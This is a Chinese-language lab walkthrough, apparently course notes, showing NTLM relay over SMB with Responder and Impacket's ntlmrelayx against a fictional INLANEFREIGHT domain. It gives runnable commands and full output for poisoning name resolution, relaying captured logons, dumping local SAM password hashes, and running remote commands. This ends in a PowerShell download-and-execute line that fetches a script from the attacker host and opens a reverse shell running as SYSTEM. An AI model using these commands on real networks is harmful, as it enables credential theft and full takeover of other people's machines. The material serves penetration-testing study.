NTLM Relay over SMB
1. ntlmrelayx
https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py
26-tools/ntlmrelayx 是 Impacket 中的一个通用 NTLM 中继模块,支持 NTLM relay 和各种中继后攻击
下面我们将使用此工具来进行演示NTLM Relay over SMB
2. 修改Responder config
因为26-tools/ntlmrelayx与Responder存在一些端口协议冲突,且我们这里需要26-tools/ntlmrelayx帮我们中继SMB和HTTP到目标服务器上,所以我们需要先修改一下Responder的配置文件,把SMB和HTTP改成Off,确保Responder就不会监听它导致端口冲突
vim /usr/share/responder/Responder.conf
3. NTLM Relay over SMB
攻击流程图:
- 172.16.117.30(攻击器)开启Responder和26-tools/ntlmrelayx
- 当域控(172.16.117.3)的用户误输入了 UNC 路径,且 Windows 尝试连接该路径时,Responder 会毒化他们的响应,并将用户重定向到我们的攻击机进行身份验证。
- 当他们连接到我们的攻击主机时,ntlmrelayx 将这些身份验证信息中继到配置为目标的服务器(172.16.117.50 和 172.16.117.60);由于用户
INLANEFREIGHT/PETER是计算机 172.16.117.50 的管理员,这导致成功执行了SAM dump
3.1.1. 运行Responder (毒化模式)
python3 Responder.py -I ens192
3.1.2. ntlmrelayx中继SMB
26-tools/ntlmrelayx 提供了 -t 和 -tf 选项用于指定中继目标;
ntlmrelayx.py -tf relayTargets.txt -smb2support
- -t 指定单个中继目标
- -tf 指定包含多个中继目标的文件。
- 如果省略 -t / -tf , ntlmrelayx 会将 NTLM 身份验证中继回发起主机,
- 这种攻击称为 NTLM self-relay 攻击(已修复,但在一些老机器上还会存在此问题)。
- -smb2support 选项为需要的主机提供 SMBv2 支持:
默认情况下, ntlmrelayx 将通过 SMB 中继 NTLM 身份验证。如果中继的会话在目标机器上具有高权限, ntlmrelayx 将尝试执行 SAM dump
等待 Responder 将身份验证信息投毒给我们,然后会被26-tools/ntlmrelayx中继到目标机器
ntlmrelayx.py -tf relayTargets.txt -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra
<SNIP>
[*] Servers started, waiting for connections
[*] SMBD-Thread-5: Connection from INLANEFREIGHT/JPEREZ@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/JPEREZ SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] SMBD-Thread-8: Connection from INLANEFREIGHT/NPORTS@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/NPORTS SUCCEED
[*] SMBD-Thread-8: Connection from INLANEFREIGHT/NPORTS@172.16.117.3 controlled, attacking target smb://172.16.117.60
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/NPORTS SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] SMBD-Thread-11: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/PETER SUCCEED
[*] SMBD-Thread-11: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, attacking target smb://172.16.117.60
[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/PETER SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] SMBD-Thread-11: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, but there are no more targets left!
[*] Starting service RemoteRegistry
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Target system bootKey: 0x563136fa4deefac97a5b7f87dca64ffa
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bdaffbfe64f1fc646a3353be1c2c3c99:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<SNIP>
[*] Done dumping SAM hashes for host: 172.16.117.50
[*] Stopping service RemoteRegistry
如果 NTLM 中继攻击无效,我们可以重新启动 ntlmrelayx 和 Responder
3.1.3. ntlmrelayx 执行命令
除了执行 SAM dump 操作外,还可以通过 -c "Command To Execute" 选项在目标机器上执行命令,这些命令将通过 SMB 运行。这里尝试对我们的攻击主机执行一次 ping 测试:
tlmrelayx.py -tf relayTargets.txt -smb2support -c 'ping -n 1 172.16.117.30'
Impacket v0.11.0 - Copyright 2023 Fortra
<SNIP>
[*] Servers started, waiting for connections
当 Responder 污染广播流量后,我们会观察到 ntlmrelayx 中继了来自 172.16.117.3 的 NTLM 身份验证,并在 172.16.117.50 上建立了认证会话;随后它利用 PETER 的认证会话执行了 ping 命令,最终在输出结果中显示了响应信息。
[*] SMBD-Thread-5: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/PETER SUCCEED
[*] SMBD-Thread-5: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, attacking target smb://172.16.117.60
[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/PETER SUCCEED
[*] Service RemoteRegistry is in stopped state
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Starting service RemoteRegistry
[*] Executed specified command on host: 172.16.117.50
Pinging 172.16.117.30 with 32 bytes of data:Reply from 172.16.117.30: bytes=32 time<1ms TTL=64
Ping statistics for 172.16.117.30:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
此外还可以获取到反向shell
我们会使用这个回连脚本
ntlmrelayx.py -tf relayTargets.txt -smb2support -c "powershell -c IEX(New-Object NET.WebClient).DownloadString('http://172.16.117.30:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 172.16.117.30 -Port 7331"
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Servers started, waiting for connections
[*] SMBD-Thread-5: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/PETER SUCCEED
[*] SMBD-Thread-5: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, attacking target smb://172.16.117.60
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/PETER SUCCEED
[*] SMBD-Thread-5: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, but there are no more targets left!
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Executed specified command on host: 172.16.117.50
[-] SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access flags are incompatible.)
[*] Stopping service RemoteRegistry
nc -lvnp 7331
Listening on 0.0.0.0 7331
Connection received on 172.16.117.50 57666
Windows PowerShell running as user WS01$ on WS01
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
nt authority\system